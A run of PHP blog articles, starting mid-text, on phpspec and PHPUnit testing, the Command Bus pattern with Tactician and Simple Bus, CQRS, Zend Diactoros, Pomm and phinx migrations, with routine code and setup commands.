On the other hand, some companies create projects they will have to maintain for decades, and those also need to deliver a first version early. Decoupling from the framework isn't something that slows down development, and there are ways to still release early (e.g. define a Minimum Viable Product and deliver small features iteration by iteration).
Note: There are a couple of bundles that provide Symfony with a Command Bus, among them:
If you're interested in the subject, here are some resources:
Reference: see the phpspec reference article
phpspec was at first a port of rspec, it can be considered as a unit test framework that enforces practices it considers best.
Note: read more about phpspec.
In this article, we'll see how to use both tools together in a same project.
We're going to build part of a fortune application for our example, more precisely we're going to build a CLI allowing us to save quotes.
To do so, we'll bootstrap a Symfony application using the Empty Edition:
composer create-project gnugat/symfony-empty-edition fortune
cd fortune
We'll need to install our test frameworks:
composer require --dev phpunit/phpunit
composer require --dev phpspec/phpspec
Finally we'll configure PHPUnit:
<?xml version="1.0" encoding="UTF-8"?>
<!-- phpunit.xml.dist -->
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit backupGlobals="false" colors="true" syntaxCheck="false" bootstrap="app/bootstrap.php">
<testsuites>
<testsuite name="System Tests">
<directory>tests</directory>
</testsuite>
</testsuites>
</phpunit>
Our first step will be to write a system test describing the command:
<?php
// tests/Command/SaveQuoteCommandTest.php
namespace AppBundle\Tests\Command;
use AppKernel;
use PHPUnit_Framework_TestCase;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Tester\ApplicationTester;
class SaveQuoteCommandTest extends PHPUnit_Framework_TestCase
{
const EXIT_SUCCESS = 0;
private $app;
protected function setUp()
{
$kernel = new AppKernel('test', false);
$application = new Application($kernel);
$application->setAutoExit(false);
$this->app = new ApplicationTester($application);
}
/**
* @test
*/
public function it_saves_a_new_quote()
{
$exitCode = $this->app->run(array(
'quote:save',
'quote' => 'Nobody expects the spanish inquisition',
));
self::assertSame(self::EXIT_SUCCESS, $exitCode, $this->app->getDisplay());
}
}
Note: Testing only the exit code is called "Smoke Testing" and is a very efficient way to check if the application is broken. Testing the output would be tedious and would make our test fragile as it might change often.
Let's run it:
vendor/bin/phpunit
The test fails because the command doesn't exist. Let's fix that:
<?php
// src/AppBundle/Command/SaveQuoteCommand.php
namespace AppBundle\Command;
use Symfony\Bundle\FrameworkBundle\Command\ContainerAwareCommand;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Output\OutputInterface;
class SaveQuoteCommand extends ContainerAwareCommand
{
protected function configure()
{
$this->setName('quote:save');
$this->addArgument('quote', InputArgument::REQUIRED);
}
protected function execute(InputInterface $input, OutputInterface $output)
{
$output->writeln('');
$output->writeln('// Saving quote');
$this->getContainer()->get('app.save_new_quote')->save(
$input->getArgument('quote')
);
$output->writeln('');
$output->writeln(' [OK] Quote saved');
$output->writeln('');
}
}
Then run the test again:
vendor/bin/phpunit
It now fails for a different reason: the service used doesn't exist.
The second step is to write the unit test for the service. With phpspec we can first bootstrap it:
vendor/bin/phpspec describe 'AppBundle\Service\SaveNewQuote'
Then we need to edit it:
<?php
// spec/AppBundle/Service/SaveNewQuoteSpec.php
namespace spec\AppBundle\Service;
use PhpSpec\ObjectBehavior;
use Symfony\Component\Filesystem\Filesystem;
class SaveNewQuoteSpec extends ObjectBehavior
{
const FILENAME = '/tmp/quotes.txt';
const QUOTE = 'Nobody expects the spanish inquisition!';
function let(Filesystem $filesystem)
{
$this->beConstructedWith($filesystem, self::FILENAME);
}
function it_saves_new_quote(Filesystem $filesystem)
{
$filesystem->dumpFile(self::FILENAME, self::QUOTE)->shouldBeCalled();
$this->save(self::QUOTE);
}
}
Time to run the suite:
vendor/bin/phpspec run
phpspec will detect that the tested class doesn't exist and will bootstrap it for us, so we just have to edit it:
<?php
// src/AppBundle/Service/SaveNewQuote.php
namespace AppBundle\Service;
use Symfony\Component\Filesystem\Filesystem;
class SaveNewQuote
{
private $filesystem;
private $filename;
public function __construct(Filesystem $filesystem, $filename)
{
$this->filesystem = $filesystem;
$this->filename = $filename;
}
public function save($quote)
{
$this->filesystem->dumpFile($this->filename, $quote);
}
}
Again, we're going to run our unit test:
vendor/bin/phpspec run
It's finally green! Our final step will be to define our service in the Dependency Injection Container:
# app/config/config.yml
imports:
- { resource: parameters.yml }
- { resource: importer.php }
framework:
secret: "%secret%"
services:
app.save_new_quote:
class: AppBundle\Service\SaveNewQuote
arguments:
- "@filesystem"
- "%kernel.root_dir%/cache/quotes"
To make sure everything is fine, let's clear the cache and run the test:
rm -rf app/cache/*
vendor/bin/phpunit
It's Super Green!
As we can see, PHPUnit and phpspec can work perfectly well together.
Of course we could write our unit test in a similar manner with PHPUnit:
<?php
// tests/Service/SaveNewQuoteTest.php
namespace AppBundle\Tests\Service;
use AppBundle\Service\SaveNewQuote;
use PHPUnit_Framework_TestCase;
class SaveNewQuoteTest extends PHPUnit_Framework_TestCase
{
const FILENAME = '/tmp/quotes.txt';
const QUOTE = 'Nobody expects the spanish inquisition!';
private $filesystem;
private $saveNewQuote;
protected function setUp()
{
$this->filesystem = $this->prophesize('Symfony\Component\Filesystem\Filesystem');
$this->saveNewQuote = new SaveNewQuote($this->filesystem->reveal(), self::FILENAME);
}
/**
* @test
* @group unit
*/
public function it_saves_new_quote()
{
$this->filesystem->dumpFile(self::FILENAME, self::QUOTE)->shouldBeCalled();
$this->saveNewQuote->save(self::QUOTE);
}
}
And run it separately:
vendor/bin/phpunit --group=unit
But then we would lose all the advantages of phpspec:
Reference: see the phpspec reference article
Note: Command Bus is often used to comply with [CQRS](/2015/08/25/cqrs.html), but not only.
Here's how to install Tactician:
composer require league/tactician:^0.6
Then we have to associate a Command to a CommandHandler:
<?php
use League\Tactician\Setup\QuickStart;
require __DIR__.'/vendor/autoload.php';
$commandBus = QuickStart::create(array(
'Vendor\Project\Member\RegisterMember' => new Vendor\Project\Member\RegisterMemberHandler(),
));
It provides many framework integrations, including one for Symfony:
composer require league/tactician-bundle:^0.3
# Don't forget to register `League\Tactician\Bundle\TacticianBundle` in `AppKernel`
Then we just have to use the tactician.commandBus service. To register Command Handlers, we
need to tag service definitions as follows:
services:
register_member_handler:
class: Vendor\Project\Member\RegisterMemberHandler
tags:
- { name: tactician.handler, command: Vendor\Project\Member\RegisterMember }
Now that the configuration is settled, here's a usage example:
$username = isset($argv[1]) ? $argv[1] : null;
$commandBus->handle(new RegisterMember($username));
The command would look like this:
<?php
namespace Vendor\Project\Member;
class RegisterMember
{
private $username;
public function __construct($username)
{
if (null === $username) {
throw new \InvalidArgumentException('Missing required "username" parameter');
}
$this->username = $username;
}
public function getUsername()
{
return $this->username;
}
}
Note: Commands validate simple input logic (required parameters, parameter type, etc).
The Command Handler could look like this:
<?php
namespace Vendor\Project\Member;
class RegisterMemberHandler
{
private $memberRepository;
public function __construct(MemberRepository $memberRepository)
{
$this->memberRepository = $memberRepository;
}
public function handle(RegisterMember $registerMember)
{
$username = $registerMember->getUsername();
if ($this->memberRepository->has($username)) {
throw new \DomainException(sprintf('Given username "%s" already exists, and duplicates are not allowed', $username));
}
$this->memberRepository->register($registerMember);
}
}
The Command Handler validates more complex logic (member username duplication, etc).
Here's a nice reference about command validation: Form, Command, and Model Validation.
Here are some personal tips!
The CommandBus is able to return the value of the executed CommandHandler. While this isn't advised in asynchronous applications (think messaging queues, like RabbitMQ), it can be useful in simple applications.
Because Commands also contain simple input validation you can write unit tests for them, but since they're mainly DTOs it might not be too important.
CommandHandlers, on the other hand, are good candidates for unit tests.
Remember when people said that controllers shouldn't have any logic in it? With the Command Bus pattern this becomes possible. It also makes this kind of logic reusable and testable.
Tactician is a nice library for this: it doesn't get in our way and allows you to choose between the "good" way or the "pragmatic" way (if you don't choose wisely, then shame on you).
TL;DR: CQRS is about not mixing "read" and "write" logic. You can use patterns like a Repository / Search Engine and Command Bus to help you achieve this.
The Single Responsibility Principle (SRP) has many applications: we can find it in the Unix philosophy ("do one thing and do it well") and usually refactoring is all about identifying responsibilities and extracting them in their own classes.
Command/Query Responsibility Segregation (CQRS) can be viewed as a part of it.
In this article, we'll explore the pros and cons of CQRS and we'll see some ways to implement it.
We usually communicate with our application by giving it an input which can be viewed as a "message". Messages can be classified in 3 different types:
Note: For more information, have a look at Messaging Flavours by Mathias Verraes.
The CQRS principle states that Imperative messages should not be mixed with Interrogatory ones.
Note: Here's an interesting article about validating those messages.
Let's take the A/B testing example: we'd like to know which setting will attract more visits on a given page. To do so when a user visits the page, we send a request to an API with some helpful information.
On receiving the request, the API can simply push a message to a Messaging Queue (e.g. RabbitMQ). This request was an Informative message.
Note: To learn more about RabbitMQ, have a look at this article and those slides.
Eventually, the Messaging Queue will call a consumer and give it the message: now the consumer must register the information somewhere. This message is an Imperative one.
Later on, we can display the statistic on a dashboard. This time, we're dealing with an interrogatory message.
As we can see, the CQRS principle is applied here. It is really useful with asynchronous use cases.
Another example would be member registration: a new member submits a registration form. If it is valid, they're told to check their email: a confirmation token has been sent to them.
Behind the scene, our application receives the request: it is an Imperative message so we create a token and save the information somewhere. Once done the application can send a "Member registered" event, which will trigger a listener that will send the email.
Note: the registration logic can be decoupled from the email logic: we can first have a service that registers members and when done sends a "Member registered" event. Then a listener could call our email service.
Once again, we've applied the CQRS principle, but in a synchronous use case. If later on our application gets successful, we might want to make those processes asynchronous, and it will be easy to do so.
Our final example will be about an API that allows scientists to report a new species. They need to send a POST Request to the endpoint, which in turn will return a response containing the created resource.
The issue here is that we're going to mix an Imperative message (report a new species) and an Interrogatory message (get the newly reported species).
CQRS cannot be applied "fully" everywhere, but we can try the following compromises:
Note: for the second solution, we need to create our own UUID, instead of relying on the database to generate the IDs.
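Generating our own UUID can be sketched in plain PHP (the `uuid_v4()` helper below is hypothetical, not part of any library mentioned here, and `random_bytes` requires PHP 7+):

```php
<?php

// Hypothetical helper: generates an RFC 4122 version 4 UUID,
// so the client knows the resource ID before the database does.
function uuid_v4()
{
    $bytes = random_bytes(16);
    $bytes[6] = chr((ord($bytes[6]) & 0x0f) | 0x40); // set version 4
    $bytes[8] = chr((ord($bytes[8]) & 0x3f) | 0x80); // set RFC 4122 variant
    return vsprintf('%s%s-%s-%s-%s-%s%s%s', str_split(bin2hex($bytes), 4));
}

// The Imperative message now carries its own ID, so the API can
// acknowledge immediately without answering an Interrogatory message.
$reportSpecies = array(
    'id' => uuid_v4(),
    'name' => 'Rattus norvegicus',
);
```

With the ID chosen upfront, the POST endpoint no longer needs to return the created resource.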
The Command Bus pattern is really helpful to handle Imperative Messages. It's composed of 3 objects: the Command (a DTO carrying the input parameters), the Command Handler (which does the actual work), and the Command Bus (which matches a Command to its Command Handler).
The Command would be constructed in an entry point (Controller, Command, EventListener), with parameters extracted from the input (Request, Input, Event), and then given to the CommandBus.
The CommandBus is usually implemented as a middleware, which lets us run extra behaviour (logging, transactions, etc.) before and after every Command.
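To illustrate the middleware idea, here's a minimal plain-PHP sketch (the class names are made up for the example, this is not the API of any specific library):

```php
<?php

// A hedged sketch of the middleware idea: each layer wraps an inner bus,
// so cross-cutting concerns run before and after every Command.
class LoggingMiddleware
{
    private $innerCommandBus;

    public function __construct($innerCommandBus)
    {
        $this->innerCommandBus = $innerCommandBus;
    }

    public function handle($command)
    {
        error_log('Handling '.get_class($command));
        $this->innerCommandBus->handle($command);
        error_log('Handled '.get_class($command));
    }
}
```

Stacking such layers (logging, transactions, the actual handler resolution) is what most Command Bus libraries do internally.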
Note: To learn more about this pattern, have a look at the following articles:
There are actually many options to handle Interrogatory messages.
The Repository design pattern introduces a class that acts like a collection, but behind the scene relies on a Gateway to actually retrieve data (could be from a file, a database, a remote endpoint etc) and on a Factory to format the returned value.
Usually "find" methods are added to the repository with a name describing the expected criterias.
Note: Here's a list of nice articles about this pattern:
Sometimes the repositories will grow bigger and bigger. The alternative solution would be to build a Criteria object and pass it to a service.
Here are some of these solutions:
Personally, I've been experimenting with a Proof Of Concept (POC): SearchEngine. I still need more experimentation before advising on this subject, so if you want to share your experience you'd be welcome to post a comment :) .
CQRS helps you to decouple your code (from itself and from third party libraries) even if, like every principle, it cannot be applied everywhere.
To help you apply it, you can use Command Bus and Repositories / SearchEngine.
Note: Here's a list of interesting articles about CQRS:
It can be installed using Composer:
composer require zendframework/zend-diactoros:^1.0
We'd like to retrieve data from remote endpoints, using our internal RequestHandler:
<?php
namespace Vendor\Project;
use Psr\Http\Message\RequestInterface;
interface RequestHandler
{
// @return \Psr\Http\Message\ResponseInterface
public function handle(RequestInterface $request);
}
Note: For the sake of our example we use this interface, but in your application you'd use an actual HTTP client (e.g. Guzzle).
RequestHandler expects a Request parameter, so we're going to build it:
<?php
namespace Vendor\Project;
use Zend\Diactoros\Request;
use Zend\Diactoros\Stream;
class MemberGateway
{
private $requestHandler;
private $username;
private $password;
public function __construct(RequestHandler $requestHandler, $username, $password)
{
$this->requestHandler = $requestHandler;
$this->username = $username;
$this->password = $password;
}
public function findOne($id)
{
$request = new Request('http://example.com/members/'.$id, 'GET', 'php://memory', array(
'Authorization' => 'Basic '.base64_encode($this->username.':'.$this->password),
));
$item = json_decode($this->requestHandler->handle($request)->getBody()->__toString(), true);
return array(
'id' => $item['id'],
'name' => $item['name'],
'description' => $item['description'],
);
}
public function createOne($name, $description)
{
$body = new Stream('php://memory', 'w');
$body->write(json_encode(array(
'name' => $name,
'description' => $description,
)));
$request = new Request('http://example.com/members', 'POST', $body, array(
'Authorization' => 'Basic '.base64_encode($this->username.':'.$this->password),
));
$item = json_decode($this->requestHandler->handle($request)->getBody()->__toString(), true);
return array(
'id' => $item['id'],
'name' => $item['name'],
'description' => $item['description'],
);
}
}
The body of Request and Response is wrapped in a Stream (as specified in PSR-7).
If the Request body should be empty, simply pass php://memory.
If the Response has a body, we can convert the Stream into a string using __toString.
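Under the hood, a PSR-7 Stream wraps a plain PHP stream resource; the behaviour can be seen with nothing but the standard library (a sketch of the concept, independent of Diactoros itself):

```php
<?php

// A PSR-7 Stream wraps a plain PHP stream resource like this one:
$resource = fopen('php://memory', 'w+');

// Writing moves the internal pointer forward...
fwrite($resource, '{"name":"Arthur Dent"}');

// ...so we rewind before reading the whole body back, which is
// essentially what Stream::__toString() does for us.
rewind($resource);
echo stream_get_contents($resource); // {"name":"Arthur Dent"}
```

This is why an "empty" body can simply be the string php://memory: it names a fresh, empty in-memory stream.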
Zend Diactoros is becoming the de facto PSR-7 implementation, for example it's used in Symfony.
You should give it a try!
In this article we'll quickly have a look at Pomm Foundation.
Pomm can be installed using Composer:
composer require pomm-project/foundation:^2.0@rc
Then we need to create a QueryManager:
<?php
require __DIR__.'/vendor/autoload.php';
$pomm = new PommProject\Foundation\Pomm(array(
'database_name' => array(
'dsn' => 'pgsql://database_user:database_pass@database_host:database_port/database_name',
'class:session_builder' => '\PommProject\Foundation\SessionBuilder',
),
));
/**
* @var PommProject\Foundation\QueryManager\QueryManagerInterface
*/
$queryManager = $pomm->getDefaultSession()->getQueryManager();
The QueryManager allows us to send queries to our database:
$items = $queryManager->query('SELECT * FROM item WHERE name = $1 AND description = $2', array(
'Arthur Dent',
'Nobody expects the Spanish Inquisition!',
));
The returned value is an iterator, each element is a row (an associative array):
foreach ($items as $item) {
echo $item['description'];
}
If you'd rather get all elements as an array, you can use iterator_to_array:
$arrayItems = iterator_to_array($items);
Note: Behind the scenes the result is stored in a resource, which is usually more efficient than a PHP array. The iterator gets the rows from the resource one by one, which can save memory.
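The memory-saving, row-by-row behaviour can be illustrated with a plain PHP generator (a sketch of the concept, not Pomm's actual implementation):

```php
<?php

// Yields rows one by one instead of building the full array upfront,
// the same lazy idea as Pomm's resource-backed iterator.
function rows()
{
    foreach (array('first', 'second') as $description) {
        yield array('description' => $description);
    }
}

foreach (rows() as $item) {
    echo $item['description'], "\n";
}

// Only materialize everything when you really need every row at once:
$all = iterator_to_array(rows());
```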
Pomm Foundation provides an efficient abstraction over pg_* functions.
In comparison, Doctrine DBAL uses PDO and tries to abstract vendor features,
so if you're using PostgreSQL and don't need an ORM, you can give it a try!
First of all, we need to install it using Composer:
composer require robmorgan/phinx:^0.4
With this we get a phar that can be run:
phinx
Tip: make your vendor's binaries available by adding vendor/bin to your $PATH: export PATH="vendor/bin:$PATH".
Then we need to configure the settings:
<?php
// File: phinx.php
$parameters = \Symfony\Component\Yaml\Yaml::parse(file_get_contents(__DIR__.'/app/config/parameters.yml'));
return array(
'paths' => array(
'migrations' => __DIR__.'/migrations'
),
'environments' => array(
'default_migration_table' => 'migration',
'default_database' => 'prod',
'prod' => array(
'adapter' => 'pgsql', // Could also be "mysql", "sqlite" or "sqlsrv"
'host' => $parameters['parameters']['database_host'],
'name' => $parameters['parameters']['database_name'],
'user' => $parameters['parameters']['database_user'],
'pass' => $parameters['parameters']['database_pass'],
'port' => $parameters['parameters']['database_port'],
'charset' => 'utf8',
),
'test' => array(
'adapter' => 'pgsql',
'host' => $parameters['parameters']['database_host'],
'name' => $parameters['parameters']['database_name'].'_test',
'user' => $parameters['parameters']['database_user'],
'pass' => $parameters['parameters']['database_pass'],
'port' => $parameters['parameters']['database_port'],
'charset' => 'utf8',
),
),
);
The configuration could also be written in YAML, here I used PHP to be able to share the database configuration with the application's one.
Migration files can be bootstrapped using the command:
phinx create FirstVersion
Which results in the following file (migrations/20150805201245_first_version.php):
<?php
use Phinx\Migration\AbstractMigration;
class FirstVersion extends AbstractMigration
{
public function change()
{
}
}
In the change method we need to get a Table object using $this->table('table_name')
and then use it to describe the changes in the schema: phinx is then able to figure out
how to reverse them if necessary.
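For instance, a reversible change method could look like this (the table and column names are made up for the example):

```php
<?php

use Phinx\Migration\AbstractMigration;

class CreateQuoteTable extends AbstractMigration
{
    public function change()
    {
        // Phinx knows how to reverse a "create":
        // rolling back this migration drops the table.
        $this->table('quote')
            ->addColumn('quote', 'text')
            ->create()
        ;
    }
}
```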
If you'd rather write SQL queries directly, you need to remove change and define
an up and a down method. In them you can use $this->query('SQL') to execute
your queries.
Example:
<?php
use Phinx\Migration\AbstractMigration;
class FirstVersion extends AbstractMigration
{
public function up()
{
$this->query('CREATE TABLE my_table;');
}
public function down()
{
$this->query('DROP TABLE my_table;');
}
}
Migrating an application then becomes as simple as:
phinx migrate
And rolling back:
phinx rollback
Time for the personal tips!
Using Doctrine Migrations is fine when using Doctrine ORM, but for the rest (including Doctrine DBAL) I'd rather use phinx.
While Table allows you to write portable migrations and saves you the time of writing the down method,
I'd advise you to write SQL queries directly: it's one less layer to learn, and it's consistent
with the migrations where you insert / update data.
Migration libraries are all very similar, the nice touch of phinx is that it's not coupled to any framework and it doesn't require any integration.
Give it a try!
The CQRS principle specifies that an application entry point (e.g. console command, or web controller) should only do an imperative command (e.g. register a member) or an interrogatory command (how many members?).
Here's a nice reference about the different kinds of commands, by Mathias Verraes: Messaging flavours.
This allows to simplify the application and the code base: those are two different concerns and with the Single Responsibility Principle we've learned that they shouldn't be mixed.
The Command Bus pattern aims at solving the imperative command part.
With this design pattern, we have 3 different kinds of class:
- Command: a DTO carrying the input parameters (e.g. RegisterMember)
- Command Handler: does the actual work for a given Command
- Command Bus: given a Command, calls the matching Command Handler
Our entry points would create the Command using the parameters received (e.g. console input or request content), and then give it to the Command Bus.
Having a Command Bus class is really nice as it allows us to execute things before and after every command: for example, in a test environment we could wrap SQL queries in transactions and roll them back.
Here's how to install Simple Bus:
composer require simple-bus/message-bus:^3.0
Since it allows us to choose how the Command Bus will find the Command Handler, we have to set it up:
<?php
use SimpleBus\Message\Bus\Middleware\MessageBusSupportingMiddleware;
use SimpleBus\Message\CallableResolver\CallableMap;
use SimpleBus\Message\CallableResolver\ServiceLocatorAwareCallableResolver;
use SimpleBus\Message\Handler\DelegatesToMessageHandlerMiddleware;
use SimpleBus\Message\Handler\Resolver\NameBasedMessageHandlerResolver;
use SimpleBus\Message\Name\ClassBasedNameResolver;
require __DIR__.'/vendor/autoload.php';
$commandHandlerMap = new CallableMap(array(
'Vendor\Project\Member\RegisterMember' => array('register_member_handler', 'handle'),
), new ServiceLocatorAwareCallableResolver(function ($serviceId) {
if ('register_member_handler' === $serviceId) {
return new Vendor\Project\Member\RegisterMemberHandler();
}
}));
$commandBus = new MessageBusSupportingMiddleware();
$commandBus->appendMiddleware(new DelegatesToMessageHandlerMiddleware(new NameBasedMessageHandlerResolver(
new ClassBasedNameResolver(),
$commandHandlerMap
)));
This creates a Command Bus that will use the given Command's Fully Qualified ClassName (FQCN, the class name with its full namespace) to call the associated Command Handler in the map. Also, the Command Handler will only be created if it is used!
This configuration looks a bit scary, but thankfully if we use Symfony we can just install the bundle:
composer require simple-bus/symfony-bridge:^3.0
# Don't forget to register `SimpleBus\SymfonyBridge\SimpleBusCommandBusBundle` in `AppKernel`
Then we just have to use the command_bus service. To register Command Handlers, we
need to tag service definitions as follows:
services:
register_member_handler:
class: Vendor\Project\Member\RegisterMemberHandler
tags:
- { name: command_handler, handles: Vendor\Project\Member\RegisterMember }
Now that the configuration is settled, here's a usage example:
$username = isset($argv[1]) ? $argv[1] : null;
$commandBus->handle(new RegisterMember($username));
The command would look like this:
<?php
namespace Vendor\Project\Member;
class RegisterMember
{
public $username;
public function __construct($username)
{
if (null === $username) {
throw new \InvalidArgumentException('Missing required "username" parameter');
}
$this->username = $username;
}
}
Note: Commands validate simple input logic (required parameters, parameter type, etc).
The Command Handler could look like this:
<?php
namespace Vendor\Project\Member;
class RegisterMemberHandler
{
private $memberRepository;
public function __construct(MemberRepository $memberRepository)
{
$this->memberRepository = $memberRepository;
}
public function handle(RegisterMember $registerMember)
{
if ($this->memberRepository->has($registerMember->username)) {
throw new \DomainException(sprintf('Given username "%s" already exists, and duplicates are not allowed', $registerMember->username));
}
$this->memberRepository->register($registerMember);
}
}
The Command Handler validates more complex logic (member username duplication, etc).
Here's a nice reference about command validation: Form, Command, and Model Validation.
Here are some personal tips!
We can reuse Command Handlers by injecting them into other Command Handlers (don't inject the Command Bus in a Command Handler).
Command Handlers were not meant to return anything (think of asynchronous messages). But this might not always be pragmatic: in that case we can store a return value in the Command.
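One pragmatic way to store that return value is a public property on the Command that the handler fills in; a hedged sketch, not part of Simple Bus itself (`$memberId` and the repository call are made up for the example):

```php
<?php

// The Command carries a slot for its own result...
class RegisterMember
{
    public $username;
    public $memberId; // filled in by the handler, read back by the caller

    public function __construct($username)
    {
        $this->username = $username;
    }
}

// ...so the caller keeps a reference to the Command and reads it afterwards:
$registerMember = new RegisterMember('arthur.dent');
$commandBus->handle($registerMember);
echo $registerMember->memberId;
```

This keeps the Command Bus interface unchanged (handle still returns nothing), which preserves the option of going asynchronous later.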
We've talked about the Command part in CQRS, what about the Query part? I've experimented a bit with a "Query Bus", but in the end I've settled down with a Search Engine class, to which a Criteria is given.
Remember when people said that controllers shouldn't have any logic in it? With the Command Bus pattern this becomes possible. It also makes this kind of logic reusable and testable.
Simple Bus is a nice library for this: it doesn't get in our way. For more information about it, read the series of articles published for its first release (caution: the public API has changed a lot since): A wave of command buses.
An alternative in the PHP world would be Tactician.
Here's also some nice slides by Richard Miller about CQRS: Avoiding the Mud.
Reference: This article is intended to be as complete as possible and is kept up to date.
phpspec is a highly opinionated unit test framework: it was conceived to practice specBDD (test method names should be sentences) and Mockist TDD (collaborators should always be mocked) and tries to enforce some testing practices (see Marcello Duarte's top 10 favourite phpspec limitations).
The first version was created by Pádraic Brady as a port of rspec, but Marcello Duarte and Konstantin Kudryashov took over and released a second version which added code generation. Ciaran McNulty then took the lead from v2.1 and added many features like collaborator generation, better exception specification and currently for version 2.3 better constructor specification.
Let's have a look at how phpspec works. For this we'll need to have a project configured with
Composer. Here's the composer.json file:
{
"name": "vendor/project",
"autoload": {
"psr-4": {
"Vendor\\Project\\": "src/Vendor/Project"
}
},
"require": {},
"require-dev": {}
}
We can install phpspec with the following:
composer require --dev phpspec/phpspec:^2.2
Let's say we want to create a class that edits text files. We can call this class
TextEditor:
phpspec describe 'Vendor\Project\TextEditor'
Tip: make your vendor's binaries available by adding vendor/bin to your $PATH: export PATH="vendor/bin:$PATH".
We should now have the spec/Vendor/Project/TextEditorSpec.php file, bootstrapped
for us by phpspec:
<?php
namespace spec\Vendor\Project;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class TextEditorSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType('Vendor\Project\TextEditor');
}
}
Note: this test can only be used to test the TextEditor class.
Our first use case will be about creating a file if it doesn't already exist.
Those are filesystem operations, so we decide to delegate the actual logic to a
Filesystem class (we'll create it later).
So our first step will be to create a set up method (it will be executed before every test method) that initializes our object:
<?php
// File: spec/Vendor/Project/TextEditorSpec.php
namespace spec\Vendor\Project;
use Vendor\Project\Service\Filesystem;
use PhpSpec\ObjectBehavior;
class TextEditorSpec extends ObjectBehavior
{
function let(Filesystem $filesystem)
{
$this->beConstructedWith($filesystem);
}
}
Arguments passed to test methods are actually test doubles (phpspec uses the typehint to know what to mock).
Now we can create the actual test method:
<?php
// File: spec/Vendor/Project/TextEditorSpec.php
namespace spec\Vendor\Project;
use Vendor\Project\Service\Filesystem;
use Vendor\Project\File;
use PhpSpec\ObjectBehavior;
class TextEditorSpec extends ObjectBehavior
{
const FILENAME = '/tmp/file.txt';
const FORCE_FILE_CREATION = true;
function let(Filesystem $filesystem)
{
$this->beConstructedWith($filesystem);
}
function it_can_force_file_creation_if_it_does_not_already_exists(File $file, Filesystem $filesystem)
{
$filesystem->exists(self::FILENAME)->willReturn(false);
$filesystem->create(self::FILENAME)->willReturn($file);
$this->open(self::FILENAME, self::FORCE_FILE_CREATION)->shouldBe($file);
}
}
This is roughly the equivalent of the following with PHPUnit:
<?php
namespace Vendor\Project\Tests;
use Vendor\Project\Service\Filesystem;
use Vendor\Project\File;
use Vendor\Project\TextEditor;
use PHPUnit_Framework_TestCase;
class TextEditorTest extends PHPUnit_Framework_TestCase
{
const FILENAME = '/tmp/file.txt';
const FORCE_FILE_CREATION = true;
private $prophet;
private $filesystem;
private $textEditor;
protected function setUp()
{
$this->prophet = new \Prophecy\Prophet();
$this->filesystem = $this->prophet->prophesize('Vendor\Project\Service\Filesystem');
$this->textEditor = new TextEditor($this->filesystem->reveal());
}
protected function tearDown()
{
$this->prophet->checkPredictions();
}
/**
* @test
*/
public function it_can_force_file_creation_if_it_does_not_already_exists()
{
$file = $this->prophet->prophesize('Vendor\Project\File');
$this->filesystem->exists(self::FILENAME)->willReturn(false);
$this->filesystem->create(self::FILENAME)->willReturn($file->reveal());
self::assertSame($file->reveal(), $this->textEditor->open(self::FILENAME, self::FORCE_FILE_CREATION));
}
}
Note: We tried to make the test method as descriptive as possible (e.g. not
testOpen()). This is the whole point of specBDD (specification Behavior Driven Development).
phpspec uses the mocking library prophecy (also available in PHPUnit since version 4.4),
which tries to be as concise as possible: to describe interactions, test doubles
can almost be used as the actual object, except we need to add a ->willReturn() or
->shouldBeCalled() call afterwards.
Note: By mocking all collaborators, we are forced to think about how our object interacts with them. This is the whole point of Mockist TDD (Mockist Test Driven Development).
Now that we have a test, we are going to execute the test suite (as advocated by TDD):
phpspec run
It will ask the following 7 questions, one for each missing element it can create for you:

- Vendor\Project\Service\Filesystem
- Vendor\Project\File
- Vendor\Project\Service\Filesystem::exists()
- Vendor\Project\Service\Filesystem::create()
- Vendor\Project\TextEditor
- Vendor\Project\TextEditor::__construct()
- Vendor\Project\TextEditor::open()

By accepting every time, phpspec will bootstrap the following
src/Vendor/Project/TextEditor.php file:
<?php
namespace Vendor\Project;
class TextEditor
{
public function __construct($argument1)
{
// TODO: write logic here
}
public function open($argument1, $argument2)
{
// TODO: write logic here
}
}
In our specification, we make use of non-existing classes (File and Filesystem),
but phpspec also bootstrapped them for us, for example src/Vendor/Project/Service/Filesystem.php:
<?php
namespace Vendor\Project\Service;
interface Filesystem
{
public function exists($argument1);
public function create($argument1);
}
This is extremely useful to kickstart our TDD cycle!
Once the code is written, we'll execute the test suite again, and then we'll add more use cases to the test class (e.g. what happens if the file already exists?).
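For illustration, here's one possible implementation that makes the specification pass. Note that the Filesystem::open() call is an assumption of this sketch: the spec above only describes forced creation, not how an existing file is opened.

<?php
// File: src/Vendor/Project/TextEditor.php
// A possible implementation satisfying the specification above (sketch).
namespace Vendor\Project;

use Vendor\Project\Service\Filesystem;

class TextEditor
{
    private $filesystem;

    public function __construct(Filesystem $filesystem)
    {
        $this->filesystem = $filesystem;
    }

    public function open($filename, $force = false)
    {
        // Create the file on demand when it doesn't exist yet.
        if ($force && !$this->filesystem->exists($filename)) {
            return $this->filesystem->create($filename);
        }

        // Hypothetical: opening an existing file isn't covered by the spec yet.
        return $this->filesystem->open($filename);
    }
}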
For further usage example, have a look at: articles tagged with phpspec.
phpspec's code generator is a big part of its value, but it could do more for us. Hence the SpecGen extension!
We can install it as follows:
composer require --dev memio/spec-gen:^0.4
echo 'extensions:' > phpspec.yml
echo ' - Memio\SpecGen\MemioSpecGenExtension' >> phpspec.yml
If we remove the code generated by phpspec:
rm src/Vendor/Project/TextEditor.php
And re-run the tests:
phpspec run
Then the generated class will be:
<?php
namespace Vendor\Project;
use Vendor\Project\Service\Filesystem;
class TextEditor
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function open($argument1, $argument2)
{
}
}
Tests are more than simple regression checks: when a class is hard to test, it indicates that it does too many things or is too coupled.
They can also be used as a design tool: in our test method we can define exactly how we would like to use the future object. We can even decide on the go that some logic could be done by collaborators that don't exist yet, and start defining how we'd like to interact with them.
This is what Emergent Design is all about: the design emerges from the tests as we go. Then they stop being simple tests, they become specifications: a living documentation of your code, which never becomes out of date.
Here are some personal tips:
- use willReturn if you need the returned value of a collaborator (official name: Stub)
- use shouldBeCalled to check that a collaborator is called (official name: Mock)
- don't combine willReturn and shouldBeCalled, you have to pick one!
- replace the it_is_a_ test method with a shouldImplement check when testing implementations
